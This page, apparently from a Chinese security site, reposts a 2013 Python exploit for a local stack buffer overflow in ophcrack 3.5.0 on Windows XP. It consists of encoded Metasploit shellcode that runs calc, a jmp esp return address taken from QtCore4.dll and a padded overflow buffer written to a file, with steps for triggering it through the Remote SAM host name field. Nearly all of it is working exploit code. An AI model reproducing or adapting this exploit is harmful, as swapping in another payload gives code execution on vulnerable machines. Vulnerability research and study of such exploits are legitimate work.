首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ophcrack 3.5.0 - Local Code Execution BOF
来源:xis_one@STM Solutions 作者:xis_one 发布时间:2013-05-22  

# Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF
# Date: 21.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage:  http://ophcrack.sourceforge.net/
# Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-#win32-installer-3.5.0.exe
# Version: 3.5.0
# Tested on: Windows XP SP3 Eng (32bits)

#!/usr/bin/python

#Stack based buffer overflow - direct EIP overwrite in this case (SEH based exploitation is possible as well)
#In order to exploit go to: Load -> Remote SAM -> put the content of buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash.
#pwdump6_setup.exe will be run by ophrack.It will nicely crash and execute the payload.
#pwdump6_setup itself doesn't look to be exploitable outside of ophrack.
#Kudos to Hostess for pointing me to #http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html

 

shellcode = (
#windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x79\x78\x6c\x49\x57\x70"
"\x65\x50\x65\x50\x75\x30\x6e\x69\x7a\x45\x44\x71\x7a\x72\x75"
"\x34\x4e\x6b\x46\x32\x30\x30\x4e\x6b\x56\x32\x34\x4c\x4e\x6b"
"\x36\x32\x54\x54\x4e\x6b\x73\x42\x71\x38\x36\x6f\x48\x37\x32"
"\x6a\x36\x46\x75\x61\x69\x6f\x34\x71\x49\x50\x6e\x4c\x55\x6c"
"\x30\x61\x61\x6c\x45\x52\x44\x6c\x57\x50\x6f\x31\x78\x4f\x56"
"\x6d\x47\x71\x69\x57\x7a\x42\x6a\x50\x31\x42\x46\x37\x4e\x6b"
"\x71\x42\x66\x70\x6e\x6b\x43\x72\x35\x6c\x66\x61\x58\x50\x6e"
"\x6b\x37\x30\x54\x38\x6e\x65\x6f\x30\x31\x64\x53\x7a\x56\x61"
"\x4e\x30\x66\x30\x6e\x6b\x50\x48\x65\x48\x4e\x6b\x30\x58\x65"
"\x70\x46\x61\x7a\x73\x6a\x43\x35\x6c\x43\x79\x6e\x6b\x46\x54"
"\x6e\x6b\x75\x51\x7a\x76\x75\x61\x49\x6f\x66\x51\x6b\x70\x4c"
"\x6c\x49\x51\x68\x4f\x66\x6d\x77\x71\x48\x47\x44\x78\x6b\x50"
"\x62\x55\x7a\x54\x34\x43\x61\x6d\x4a\x58\x67\x4b\x53\x4d\x66"
"\x44\x71\x65\x49\x72\x72\x78\x6e\x6b\x73\x68\x44\x64\x53\x31"
"\x5a\x73\x43\x56\x6e\x6b\x54\x4c\x30\x4b\x4e\x6b\x73\x68\x35"
"\x4c\x56\x61\x4b\x63\x4c\x4b\x66\x64\x6c\x4b\x46\x61\x58\x50"
"\x4f\x79\x32\x64\x56\x44\x54\x64\x73\x6b\x63\x6b\x65\x31\x31"
"\x49\x72\x7a\x62\x71\x49\x6f\x69\x70\x62\x78\x31\x4f\x30\x5a"
"\x6c\x4b\x44\x52\x5a\x4b\x4b\x36\x51\x4d\x53\x5a\x67\x71\x6c"
"\x4d\x4b\x35\x78\x39\x75\x50\x35\x50\x45\x50\x42\x70\x30\x68"
"\x35\x61\x6e\x6b\x42\x4f\x4d\x57\x79\x6f\x69\x45\x4d\x6b\x6b"
"\x4e\x66\x6e\x54\x72\x59\x7a\x43\x58\x59\x36\x4d\x45\x6d\x6d"
"\x4f\x6d\x39\x6f\x5a\x75\x75\x6c\x34\x46\x73\x4c\x57\x7a\x6d"
"\x50\x4b\x4b\x49\x70\x61\x65\x44\x45\x4f\x4b\x61\x57\x74\x53"
"\x32\x52\x52\x4f\x31\x7a\x43\x30\x36\x33\x39\x6f\x49\x45\x50"
"\x63\x65\x31\x32\x4c\x63\x53\x43\x30\x41\x41")

#!mona jmp -r esp -cp ascii -> 0x6e2a2936 : jmp esp  asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll]


jmp="\x36\x29\x2a\x6e"
buffer = "A"*497 + jmp + shellcode

print(buffer)

file = open('exploit.txt','w')
file.write(buffer)
file.close()



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link DIR615h OS Command Inje
·Linksys WRT160nv2 apply.cgi Re
·Glibc 2.11.3 / 2.12.x LD_AUDIT
·win32k!EPATHOBJ::pprFlattenRec
·Nginx 1.3.9 / 1.4.0 Denial Of
·Mutiny 5 Arbitrary File Upload
·Analysis of nginx 1.3.9/1.4.0
·SSH User Code Execution
·AdobeCollabSync Buffer Overflo
·Serva 32 TFTP 2.1.0 - Buffer O
·Nginx HTTP Server 1.3.9-1.4.0
·Quick Search Version 1.1.0.189
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved